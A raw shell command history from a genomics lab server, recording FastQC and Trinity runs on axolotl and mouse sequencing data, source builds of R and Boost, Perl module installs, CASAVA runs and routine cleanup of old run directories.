/isitools/FastQC/fastqc -t 20 Axo_J_TC_3h/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_5d/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_6h/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_7d/*.fq --outdir=./fastQC_OUT/ & +top -d 3 + history |grep fastqc |grep perl +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_5d/*.fq --outdir=./fastQC_OUT/ & +tail nohup.out +tail -f nohup.out +pwd +ls +ls +ls -lt +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita +du -sch 120706_SSprimaryhepmicroRNA_00092_Evita +ls /gluster_nx/illumina/galaxy/120706_SSprimaryhepmicroRNA_00092_Evita/ +du -sch /gluster_nx/illumina/galaxy/120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr /gluster_nx/illumina/galaxy/120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/ +ls -ltr /gluster_nx/illumina/galaxy/120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/Intensities/ +ls -ltr /gluster_nx/illumina/galaxy/120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/Intensities/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/Intensities/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/ +ls -ltr /gluster_nx/illumina/galaxy/120706_SSprimaryhepmicroRNA_00092_Evita/ +du -sch 120706_SSprimaryhepmicroRNA_00092_Evita/Data/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/reports/p +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/reports/ +ls -ltr /runs/120706_SSprimaryhepmicroRNA_00092_Evita/Data/reports/ +ls +rm -fr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/ & +ls -lt +du -sck 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ /runs/120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ +ls -ltr 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ /runs/120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ +ps auxww |grep rm +ls -ltr /runs/120706_SSprimaryhepmicroRNA_00092_Evita/Data/reports/ +ls -ltr /runs/120706_SSprimaryhepmicroRNA_00092_Evita/ +ls -ltr /runs/120706_SSprimaryhepmicroRNA_00092_Evita/Data/ +ls -ltr /runs/120706_SSprimaryhepmicroRNA_00092_Evita/Data/Intensities/ +ls -ltr /runs/120706_SSprimaryhepmicroRNA_00092_Evita/Data/Intensities/BaseCalls/ +ls -ltr 120706_SSprimaryhepmicroRNA_00092_Evita/Data/Intensities/BaseCalls/ +ls -ltr +pwd +ls -lt +ls -ltr 120717_rerunSSprimaryhepmicroRNA_00093_Evita +ls -ltr 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ +ls -ltr 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/Intensities/BaseCalls/ +ls -ltr /runs/120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/Intensities/BaseCalls/ +ls -ltr 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/Intensities/BaseCalls/ +ls +du -sch 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ +du -sch /runs/120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ +du -sch 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/* +du -sch 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/Intensities/* +rm -fr 120717_rerunSSprimaryhepmicroRNA_00093_Evita/Data/ & +df -h +ls -lt +du -sch 120824_SN1057_0088_BD11ACACXX/Data/ +du -sch 120824_SN1057_0088_BD11ACACXX +du -sch /runs/120824_SN1057_0088_BD11ACACXX +ls -lt +ls 120915_SN1057_0090_BC11FRACXX/ +ls 120915_SN1057_0090_BC11FRACXX/120915_SN1057_0090_BC11FRACXX/ +mv 120915_SN1057_0090_BC11FRACXX/120915_SN1057_0090_BC11FRACXX/ . +ls +ls 120915_SN1057_0090_BC11FRACXX +ls 120915_SN1057_0090_BC11FRACXX/120915_SN1057_0090_BC11FRACXX/ +ls -ltr 120915_SN1057_0090_BC11FRACXX/120915_SN1057_0090_BC11FRACXX/ +ls -ltr +ls -lr +ls -lt +ls -lt |grep victor +ls -lt |grep victor +ls -ltr +ls -ltr +ls -ltr |grep jnie +ls -ltr |grep shulan +ls -ltr |grep victor +ls opt/ +ls 1.1.2/ +ls -ltr 1.1.2/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX/ +du -sch 120608_SN1057_0082_BC0VCDACXX//Data/ /runs/120608_SN1057_0082_BC0VCDACXX//Data/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/ /runs/120608_SN1057_0082_BC0VCDACXX//Data/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/ /runs/120608_SN1057_0082_BC0VCDACXX//Data/Intensities/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/BaseCalls/ /runs/120608_SN1057_0082_BC0VCDACXX//Data/Intensities/BaseCalls/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/reports/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/ +ls -ltr 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/BaseCalls/ +cat 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/BaseCalls/run_BCL.sh +du -sch 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/BaseCalls/*qseq* +rm -fr 120608_SN1057_0082_BC0VCDACXX//Data/Intensities/BaseCalls/*qseq* & +df -h +ls -ltr +ls -ltr chrisCellCycle/ +ls -ltr SAS +ls +ls jeff/ +ls jeff/120926_SN1057_0091_BD16 +ls jeff/Lifang/ +ls jeff/Lifang/8 +ls jeff/Lifang/* +ls jeff/Lifang/ +ls +ls dataforaxo/ +ls -ltr dataforaxo/ +ls -ltr shed_tools/ +ls -ltr shed_tools/toolshed.g2.bx.psu.edu/ +ls -ltr shed_tools/toolshed.g2.bx.psu.edu/repos/ +ls -ltr +ls -ltr AxoRNAAssemblyTrinity/ +rm -fr AxoRNAAssemblyTrinity/ +ls +ls -ltr +man find +man find +man find +find . -maxdepth 2 |wc -l +find * -maxdepth 2 |wc -l +find * |wc -l +ls -ltr 070810_HWI-EAS57_0003_miRNAGuangjin_9382.gz/Data/C1-27_Firecrest1.8.28_22-08-2007_solexa: +ls -ltr 070810_HWI-EAS57_0003_miRNAGuangjin_9382.gz/blast +ls -ltr 070810_HWI-EAS57_0003_miRNAGuangjin_9382.gz +man find +man find +find . -perm 600 +sudo find /isiseqruns/ -perm 600 |xargs chmod 660 & +fg +bg +ps axuww |grep fins +ps axuww |grep find +ps axuww |grep find +ls RonAxoTrinity/ +ls -ltr RonAxoTrinity/ +cat RonAxoTrinity/Axo\ Sample\ list4.xls +perl -MCPAN -e shell +ls -ltr +ls -ltr +mkdir /datadev/homes/mikec/scripts-mikec/python +vi /datadev/homes/mikec/scripts-mikec/python/excelToCSV.py +ls -ltr /datadev/homes/mikec/scripts-mikec/python/excelToCSV.py +vi /datadev/homes/mikec/scripts-mikec/python/excelToCSV.py +cp /datadev/homes/mikec/scripts-mikec/python/excelToCSV.py ./ +ls +vi excelToCSV.py +mv Axo\ Sample\ list4.xls Axo +ls +mv Axo Axo_Sample_list4.xls +ls +vi excelToCSV.py +python excelToCSV.py +vi excelToCSV.py +python excelToCSV.py +ls +ls -ltr/isiseqruns/130517_SN1057_0125_BD1FLYACXX/nohup.out +ls -ltr /isiseqruns/130517_SN1057_0125_BD1FLYACXX/nohup.out +ls -ltr +ls -ltr AxoMikeTest/ +find /gluster_nx/illumina/galaxy \( -name "*.out" -o -name "*.py" \) -exec ls -1 {} \; +find ./ \( -name "*.out" -o -name "*.py" \) -exec ls -1 {} \; +find ./ \( -name "nohup.out" -o -name "*.py" \) -exec ls -1 {} \; +man find +find . -type f | perl -ne 'print $1 if m/\.([^.\/]+)$/' | sort -u +ls +ls +pwd +pwd +history +ls +history |grep perl +ls +history |grep convert +history |grep Trinity.pl +ls -ltr +fg +bg +ps axuww |grep perl +ps axuww |grep perl +history |grep fastq +ps auxww |grep fastq +ps axuww |grep nohup.out +ps axuww |grep nohup +ps axuww |grep fastq +ls +ls -ltr +ls chrysalis/ +top -d 5 +ps axuww |grep Trinity.pl +tail -f nohup.out +ls chrysalis/ +tail -f nohup.out +w +du -sch /gluster_nx/illumina/galaxy/100105_Axoset3_PE_Eva/ +top -d 5 +ls +ls -ltr +pwd +ls -ltr chrysalis/ +ping winbio +nslookup winbio +ping winbio +ping winbio +ping winbio +mkdir /isitools/perl5.10.1 +ls /opt +sudo rsync -a mir-19:/opt/perl5.10.1 /opt/ +locate boost |grep include +: +locate libboost_random.a +top +pwd +id +exit +ls +ls +ls /opt/ +which R +ls +mv R-2.15.2 R-2.15.2_WORKING +pwd +ls +tar zxf ../R-2.15.2.tar.gz +ls +ls -ltr +pwd +./configure --with-x=yes --prefix=/opt/R-2.15.2 --exec-prefix=/opt/R-2.15.2/bin +make -j 36 +make -j 36 install +ls +which R +pwd +ls +pwd +ls /opt/ +ls -ltr /opt/ +cp -a /opt/R-2.15.2 /isitools/CentOS-5/ +ls -ltr /isitools/CentOS-5/R-2.15.2 +ls -ltr /isitools/CentOS-5/R-2.15.2/bin/ +which R +cat ~/.bash_profile +ls -ltr /isitools/CentOS-5/R-2.15.2/lib64/R +ls -ltr /isitools/CentOS-5/R-2.15.2/share/ +ls -ltr /isitools/CentOS-5/R-2.15.2/share/man/` +ls -ltr /isitools/CentOS-5/src/ +ls -ltr /isitools/CentOS-5/src/R-2.15.2 +ls -ltr /isitools/CentOS-5/src/R-2.15.2/library/ +ls -ltr /isitools/CentOS-5/src/R-2.15.2/bin/ +ls -ltr /isitools/CentOS-5/src/R-2.15.2/bin/exec/ +diff /isitools/CentOS-5/src/R-2.15.2/bin/exec/R bin/R +ls -ltr +ls +pwd +ls +ls -tlr /isitools/CentOS-5/R-2.15.2 +ls -tlr /isitools/CentOS-5/R-2.15.2/bin/ +ls -tlr /isitools/CentOS-5/R-2.15.2/bin/lib64/ +ls -tlr /isitools/CentOS-5/R-2.15.2/bin/lib64/ +ls -tlr /isitools/CentOS-5/R-2.15.2/bin/lib64/R/ +exit +which R +ls /isitools/CentOS-5/R-2.15.2/bin/lib64/R +ls /isitools/CentOS-5/R-2.15.2/bin/lib64/R/bin/ +ls +pwd +history |grep configure +ls +rm -fr /opt/R-2.15.2 +ls -ltr +ls -ltr +pwd +ls -ltr +ls R-2.15.2* +rm -fr R-2.15.2 +/opt/R-2.15.2_WORKING/bin/R +cp -a /opt/R-2.15.2 . +cp -a /opt/R-2.15.2_WORKING ./R-2.15.2 +rm -fr R-2.15.2 +ls -ltr +ls -ltr +ls -ltr +which R +exit +which R +exit +ls +wgetsecure/attachment/10800/summarize_for_ss.tar.gz +ls +ls -ltr +mv login.jsp\?permissionViolation\=true\&os_destination\=%2Fsecure%2Fattachment%2F10800%2Fsummarize_for_ss.tar.gz temp/summarize.ss.tar.gz +ls +tar zxf summarize.ss.tar.gz +ls +gunzip summarize.ss.tar.gz +ls +tail summarize.ss.tar.gz +ls +mv ../summarize_for_ss.tar.gz . +ls +ls -ltr +rm -fr summarize.ss.tar.gz +tar zxf summarize_for_ss.tar.gz +ls +mv summarize_for_ss.tar.gz ../ +mv summarize_for_ss/ ../../ +ls +ls +ls +make -j 24 +ls -ltr +less Makefile +less README +vi Makefile +ls boost +pwd +ls +find . -iname "boost" +find . -iname "boost*" +find ../ -iname "*boost*" +ls ../rsem_eval_1.3/boost/ +mv summarize_for_ss/ rsem_eval_1.3/ +pwd +ls ../boost/ +vi Makefile +ls ../boost/ +locate boost |grep include +vi Makefile +make clean +make -j 24 +ls +ls -ltr +make clean +nohup make -j 24 +less nohup.out +kls +make clean +nohup make -j 24 & +tail -f nohup.out +less nohup.out +ls +pwd +wgetsourceforge.net/projects/boost/files/boost/1.53.0/boost_1_53_0.tar.gz/download +ls +tar zxf boost_1_53_0.tar.gz +bg +cp boost_1_53_0.tar.gz /opt//src/ +ls +tar zxf boost_1_53_0.tar.gz +ls +ls +cat INSTALL +ls boo +pwd +ls +ls boost +ls +cat bootstrap.sh +ls -ltr +lynx index.html +lynx index.html +pwd +ls +ls src/ +ls src/temp/ +ls src/temp/boost_1_53_0 mv . +mv src/temp/boost_1_53_0 . +ls +ls +pwd +ln -s /isitools/CentOS-5/boost_1_53_0/ /isitools/CentOS-5/boost +ls -ltr ..//../ +c d../.. +ls +unlink boost +ln -s ./boost_1_53_0/ boost +ls -ltr +ls boost +pwd +vi Makefile +make clean +make -j 24 +vi Makefile +top +vi Makefile +ls +make clean +pwd +make -j 24 +pwd +ls +vi Makefile +cat Makefile +vi Makefile +make clean +nohup make -j 24 +tail -f nohup.out +ls +find . name g++ +find . -name g++ +find . -name "g++*" +vi Makefile +locate g++ |grep bin +diff /usr/bin/g++ /usr/bin/x86_64-redhat-linux-g++ +ls +more README +ls +vi Makefile +ls -ltr +nohup make -j 24 +less nohup.out +ls deweylab/bio/formats/fasta/InputStream.hh: +ls deweylab/bio/formats/fasta/InputStream.hh +ls -ltr deweylab/bio/formats/fasta/InputStream.hh +grep "deweylab" * +man grep +man grep +grep --exclude=nohup "deweylab" * +grep --exclude nohup "deweylab" * +grep "deweylab" * --exclude nohup.out +grep "deweylab" * --exclude nohup.out +perl -MCPAN -e shell +vi Makefile +ls +head README +vi Makefile +pwd +vi Makefile +history |grep configure +top +top -d 5 +top -d 5 +R +which R +exit +which R +R +exit +pwd +sudo tar zxf ./CentOS-5/src/temp/boost_1_53_0.tar.gz +tar zxf ./CentOS-5/src/temp/boost_1_53_0.tar.gz +ls +ln -s boost_1_53_0/ boost +ls -ltr +ls +./bootstrap.sh +./b2 +ls +ls +pwd +ls +pwd +ls +ls -ltr ss +ls +ls ../src/ +ls /isitools/CentOS-5/src/ +ls /isitools/CentOS-5/src/temp/ +cp /isitools/CentOS-5/src/summarize_for_ss.tar.gz /isitools/rsem_eval_1.3/ +pwd +ls -ltr +tar zxf summarize_for_ss.tar.gz +ls +ls -ltr +mv summarize_for_ss.tar.gz ../src/ +ls +ls +vi Makefile +ls +vi Makefile +make -j 64 +make clean +nohup make -j 64 +less nohup.out +ls -ltr deweylab/bio/formats/fasta/Record.hh +less nohup.out +ls -ltr deweylab/bio/formats/fasta/ +less nohup.out +ls -ltr deweylab/bio/formats/fasta.hh +cat deweylab/bio/formats/fasta.hh +R +history +ls +ls +R +which R +pwd +rm -fr /isitools/R-2.15.2/ +make distclean +make clean ; ./configure --with-x=yes --with-cairo --prefix=/isitools/R-2.15.2 --exec-prefix=/isitools/R-2.15.2 --enable-R-shlib ; make -j 32 ; make -j 32 install +make clean ; ./configure --with-x=yes --with-cairo --prefix=/isitools/R-2.15.2 --exec-prefix=/isitools/R-2.15.2 --enable-R-shlib ; make -j 64 ; make -j 64 install +which R +R +exit +cat /etc/rc.local +exit +ls +ls Contaminants/ +cat Contaminants/contaminant_list.txt +ls +less Trinity.timing +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/Trinity.timing +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile/ +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile/Trinity.fasta +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile/Trinity.timing +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/Trinity.timing +ls /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ +ls -LTR /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ +ls + Trinity.fasta 71 MByte +/isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_autopod/Trinity.fasta +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_autopod/Trinity.timing +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_autopod/ +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_autopod/Trinity.timing +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_zeugopod/Trinity.fasta +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_zeugopod/Trinity.timing +ls -ltlr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_zeugopod/ +/isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Dist_Zeugo/Trinity.fasta +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Dist_Zeugo/Trinity.timing +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Dist_Zeugo/ +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Dist_Zeugo/Trinity.timing +less /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/Trinity.timing + find . -name Autopod/Trinity.timing |xargs cat + find . -name Trinity.timing + find ./Autopod/ -name Trinity.timing |xargs cat + find ./Autopod/ -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +ls + find ./Autopod/ --maxlevel 1 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test + find ./Autopod/ --max-depth 1 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test + find ./Autopod/ --maxdepth 1 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +man find + find ./Autopod/ -maxdepth 1 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +cat /tmp/Trinity.timing.test + find ./ -maxdepth 2 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +cat /tmp/Trinity.timing.test +ls Blastema/ + find ./Blastema/ -maxdepth 2 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +less /tmp/Trinity.timing.test +vi /tmp/Trinity.timing.test +history |grep find +rm /tmp/Trinity.timing.test +find ./ -maxdepth 2 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +find ./Blastema/ -maxdepth 2 -name Trinity.timing |xargs cat >> /tmp/Trinity.timing.test +less /tmp/Trinity.timing.test +ls +ls +mv adult/ adult_FAIL +mkdir adult +ls +ls +ls ../adult_FAIL/ +ls -ltr ../adult_FAIL/ +mv ../adult_FAIL/axo_*.fa . +mv ../adult_FAIL/both.fa . +ls +ls +ls +ls +ls +ls +cat Trinity.timing +head Trinity.fasta +head -n 200 Trinity.fasta |more +tail -n 200 Trinity.fasta |more +grep ">comp" |wc -l +grep ">comp" |wc -l > numReadsInFastaOut.txt & +ls +fg +bg +ps axuww |grep grep +ls +fg +ls +cat numReadsInFastaOut.txt +grep ">comp" |wc -l +grep ">comp" Trinity.fasta |wc -l > numReadsInFastaOut.txt & +tail numReadsInFastaOut.txt +ls +mv numReadsInFastaOut.txt numReads_Trinity.Fasta.txt +ls +cat numReads_Trinity.Fasta.txt +cat contig.stats.sh +ls +cat concatAxoFastqFiles.sh +ls +cat contig.stats.sh +ls +cat Trinity.timing +ls +ls -ltr +cat concatAxoFastqFiles.sh +ls +ls -ltr +head single.fa +grep ">HWI" single.fa |wc -l +ls +pwd +ls -ltr +history +ls +ls ../juvenile +ls -ltr ../juvenile +ls -ltr +ls -ltr ../juvenile +ls +ls -ltr +ls -ltr ../juvenile +vi ../juvenile/concatAxoFastqFiles.sh +ls +ls -ltr +cat Trinity.timing +ls ../../ +ls ../../elbow/ +ls -ltr ../../elbow/ +ls -ltr ../../Elbow +ls -ltr ../../Blastema/ +ls ../../ +la +ls +cat Trinity.timing +ls +cat numReads_Trinity.Fasta.txt +ls +head single.fa +history |grep grep +ls +head single.fa +ls -ltr +cat numReads_Trinity.Fasta.txt +grep ">HWI" single.fa > numReads_Input.Fasta.txt +grep ">HWI" single.fa |wc -l > numReads_Input.Fasta.txt +bg +ls +ls -ltr +cat numReads_Input.Fasta.txt +ls -ltr +cat Trinity.timing +ls -ltr +numReads_Trinity.Fasta.txt +cat numReads_Trinity.Fasta.txt +ls -ltr +tail nohup.out +ls +ls -ltr +ls +ls -ltr +tail Trinity.timing +ls -ltr +cat numReads_Input.Fasta.txt +uname -a +sudo su +exit +sudo su +id +exit +sudo chown cshafer:mir /gluster_nx/seq_projects/Christy_TEST/ +sudo chmod 775 /gluster_nx/seq_projects/Christy_TEST/ +exit +ls +pwd +ls +ls +ls +ls +pwd +ls +ls +ls +ls +ls +ls +cp -a /gluster_nx/illumina/galaxy/130429_SN1057_0123_BC1AFWACXX/RunInfo.xml . +man cp +ls +ls -ltr +pwd +fastqc +history +fastqc mouse_digit_TC_0hr_raw.fq --outdir=./fastQC_OUT/ +head /isitools/CentOS-5/FastQC/fastqc +pwd +ls /isitools/FastQC/ +vi /isitools/FastQC/fastqc +ps axuww |grep mkec +ps axuww |grep mikec +ls -ltr /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.61/comp123237 +ls -ltr /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.61/ +ls -ltr /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial//chrysalis/RawComps.61/ +ps axuww |grep mikec +top +ls -ltr +ls -ltr trinity_out_dir/ +pwd +ls ../mmus/endothelial/ +ls -ltr ../mmus/endothelial/ +which perl +history |grep FastQC +history |grep FastQC +history |grep fastqc +fg +ls +top +pwd +pwd +ls +ls fastqc_out/ +which blat +which fastqc +fastqc --help +perl fastqc --help +fastqc +/isitools/CentOS-5/fastqc +/isitools/CentOS-5/fastqc/fastqc +/isitools/fastqc/fastqc +pwd +ls fastqc_out/ +ls +ls -ltr fastqc_out/ +ls ../ +ls ../../mouse_digit/fastqc_out/ +ls ../../mouse_digit/fastqc_out/mouse_digit_TC_0hr_raw.fq_fastqc +top +top -d 3 +ls -ltr /isiseqruns/RonAxoTrinity/ +ls -ltr /isiseqruns/RonAxoTrinity/Axo_J_TC_Test/ +ls -ltr /isiseqruns/RonAxoTrinity/Axo_J_TC_Test/fastQC_OUT/ +top -d 3 +ls +ls -ltr fastQC_OUT/ +ls -ltr fastQC_OUT/ +du -sch fastQC_OUT/ +pwd +ls +mkdir temp +ls +gitsvkit +git clonesvkit temp/ +ls temp/ +mv temp/ csvkit +ls +ls +python setup.py +python install setup.py +python setup.py +cat README +ls -ltr +cat requirements.txt +ls +python setup.py install +rpm -qa |grep setuptools +yum search setup setup |grep tools +yum search setup |grep tools +yum install python-setuptools.noarch +sudo yum install python-setuptools.noarch +yum search setup |grep tools +top +pwd +ls +pwd +ls +ls +ls +ls +du -sch ../1* +rm -fr ../1* +bg +ls +ls ../ +ls +ls ./ +ps axuww |grep rm +ls +ls -ltr ../ +ls -ltr ../ +ls -ltr +ls +ls +ls +cp ../concatAxoFastqFiles.sh elbow/ +vi concatAxoFastqFiles.sh +ls +./concatAxoFastqFiles.sh +vi concatAxoFastqFiles.sh +./concatAxoFastqFiles.sh +ls +rm -fr axo* +ls +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls +vi concatAxoFastqFiles.sh +ls +cat nohup.out +mv nohup.out nohup.out_concat +ls +history |grep trinity +pwd +ls +ls +ls +history |grep concatAxoFastqF +ps auxww |grep concat +ls +ps axuww |grep elbow +tail -f nohup.out +ls +ls nohup.out* +cat nohup.out_concat +ls +fg +history |grep convert +history |grep Trinity.pl +fg +top -d 5 +top -d 5 +ls +ls -ltr chrysalis/ +top -d 5 +ls +ls +make clean +make distclean +ls +./configure --help +./configure --with-x=yes --prefix=/opt/R-2.15.2 --exec-prefix=/opt/R-2.15.2 --enable-R-shlib +make -j 32 +make -j 32 install +ls /opt/ +ls -ltr /opt/ +ls -ltr /opt/R-2.15.2 +cp -a /opt/R-2.15.2 . +history +ls +ls temp/ +ls R-2.15.2 +pwd +make distclean +ls +make distclean +pwd +ls +./configure --with-x=yes --prefix=/isitools/CentOS-5/R-2.15.2 --exec-prefix=/isitools/CentOS-5/R-2.15.2 --enable-R-shlib ; make -j 32 ; make -j 32 install +R +pwd +./configure --help |grep cairo +./configure --help |grep cairo +./configure --help +make clean ; ./configure --with-x --with-cairo --prefix=/isitools/CentOS-5/R-2.15.2 --exec-prefix=/isitools/CentOS-5/R-2.15.2 --enable-R-shlib ; make -j 32 ; make -j 32 install +ls -ltr /isitools/CentOS-5/ +ls -ltr /isitools/CentOS-5/R-2.15.2 +ls -ltr /isitools/CentOS-5/R-2.15.2/bin/ +ls -ltr /isitools/CentOS-5/R-2.15.2/lib64/ +ls -ltr /isitools/CentOS-5/R-2.15.2/lib64/R/ +ls -ltr /isitools/CentOS-5/R-2.15.2/lib64/R/etc/ +which R +R +history |grep configure +history |grep Trinity.pl +history |grep Trinity.pl |grep adult +top -d 5 +top -d 5 +exit +which R +R +ls +cat /proc/meminfo +id +ls -l +ls +ls -ltr +cat mikec_Run_CASAVA.sh +ls ./Data/Intensities/BaseCalls +ls ./Data/Intensities/BaseCalls/L001/ +ls ./Data/Intensities/BaseCalls/L001/C10.1/ +cat mikec_Run_CASAVA.sh +cat ./SampleSheet_Lanes12345678.csv +ls +ls -ltr +cat mikec_Run_CASAVA.sh +nohup mikec_Run_CASAVA.sh & +tail -f nohup.out +id +perl -MCPAN -e shell +reset +exit +pwd +perl -MCPAN -e shell +echo $HOME +echo $HOME=/isitools/CentOS-5/ +vi /isitools/.bash_profile +export HOME=/isitools/CentOS-5/ +echo $HOME +ls -lart +perl -MCPAN -e shell +perl -MCPAN -e shell +reset +perl -MCPAN -e shell +pwd +history |grep mikec |grep run +perl -MCPAN -e shell +echo $HOME +history |grep export +which perl +ereset +reset +perl -MCPAN -e shell +ls +ls +make -j 32 +cat Makefile +ls +rm -fr XML-Simple-2.20-3hU6BK/ +perl -MCPAN -e shell +exit +which perl +vi /isitools/.bash_profile +exit +pwd +history |grep mikec |grep run +ls +ls -ltr +cat nohup.out +rm nohup.out +nohup ./mikec_Run_CASAVA.sh & +tail -f nohup.out +which perl +echo $HOME +export HOME=/isitools/CentOS-5/ +rm nohup.out +nohup ./mikec_Run_CASAVA.sh & +tail nohup.out +which perl +echo $PATH +ls -ltr /isitools/CentOS-5/.cpan/build/ +rm nohup.out +nohup ./mikec_Run_CASAVA.sh & +cat nohup.out +top +ls +rm -fr nohup.out +ls +nohup ./mikec_Run_CASAVA.sh & +cat nohup.out +which perl +vi /isitools/.bash_profile +which perl +exit +which perl +perl -MCPAN -e shell +echo $HOME +history |grep export +export HOME=/isitools/CentOS-5/ +perl -MCPAN -e shell +perl -MCPAN -e shell +exit +which perl +cat /isitools/.bash_profile +grep if /isitools/.bash_profile +vi /isitools/.bash_profile +exit +which perl +echo $HOME +pwd +ls +rm nohup.out +nohup ./mikec_Run_CASAVA.sh & +cat nohup.out +which perl +perl -V +echo $HOME +ls +ls +rm -fr XML* +pwd +ls -ltr +cat nohup.out +rm nohup.out +nohup ./mikec_Run_CASAVA.sh & +cat nohup.out +ls /isitools/CentOS-5/perl5.10.1/lib/5.10.1/x86_64-linux-thread-multi-ld +ls -ltr /isitools/CentOS-5/perl5.10.1/lib/5.10.1/x86_64-linux-thread-multi-ld +find /isitools//CentOS-5/ -name Simple.pm +find /isitools//CentOS-5/ -name Simple.pm |grep XML +find /isitools//CentOS-5/ -name Simple.pm |grep XML |xargs ls -l +vi /isitools/.bash_profile +exit +echo $HOME +pwd +ls -ltr +rm -fr XML-Simple-2.20-* +perl -MCPAN -e shell +ls +ls +make -j 24 +make install +ifconfig +df -h +ls -ltr +make clean +make distclean +make clean +ls +make -j 32 +perl Makefile.PL +ls +ls +perl -MCPAN -e shell +perl -MCPAN -e shell +ls +ls -ltr +updatedb +sudo updatedb +bg +exit +echo $HOME +which perl +ls -ltr ~/.cpan/build/ +rm-fr ~/.cpan/build/XML* +rm -fr ~/.cpan/build/XML* +rm -fr ~/.cpan/build/YAML-0.84-NLP5lx/ +ls -ltr ~/.cpan/build/ +echo $HOME +vi /isitools/.bash_profile +ls -ltr ~/.cpan/build/ +pwd +cat nohup.out +rm nohup.out +nohup ./mikec_Run_CASAVA.sh & +cat nohup.out +ls 